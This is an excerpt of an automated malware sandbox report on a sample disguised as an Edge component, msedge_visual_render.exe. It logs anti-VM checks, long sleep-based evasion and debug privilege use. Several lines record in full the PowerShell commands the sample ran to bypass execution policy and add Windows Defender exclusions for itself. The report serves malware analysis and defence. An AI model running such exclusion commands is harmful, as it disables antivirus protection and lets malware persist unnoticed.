              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exeMemory allocated: 960000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeMemory allocated: 1A6F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeMemory allocated: C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\msedge.exeMemory allocated: 1A8D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\msedge.exeMemory allocated: 1360000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\msedge.exeMemory allocated: 1B080000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\msedge_visual_render.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\msedge.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWindow / User API: threadDelayed 771Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWindow / User API: threadDelayed 9071Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6177Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3621Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7963Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1616Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7740Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1941Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6372Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3285Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exe TID: 6348Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7084Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768Thread sleep count: 7963 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604Thread sleep count: 1616 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep count: 7740 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 1941 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep count: 6372 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2780Thread sleep count: 3285 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exe TID: 6504Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\msedge.exe TID: 2452Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\msedge.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\msedge_visual_render.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\msedge.exeThread delayed: delay time: 922337203685477
              Source: msedge_visual_render.exe, 00000000.00000002.3299446821.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22'
              Source: msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dllity.SqlRoleProvider, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeQueries volume information: C:\Users\user\Desktop\msedge_visual_render.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
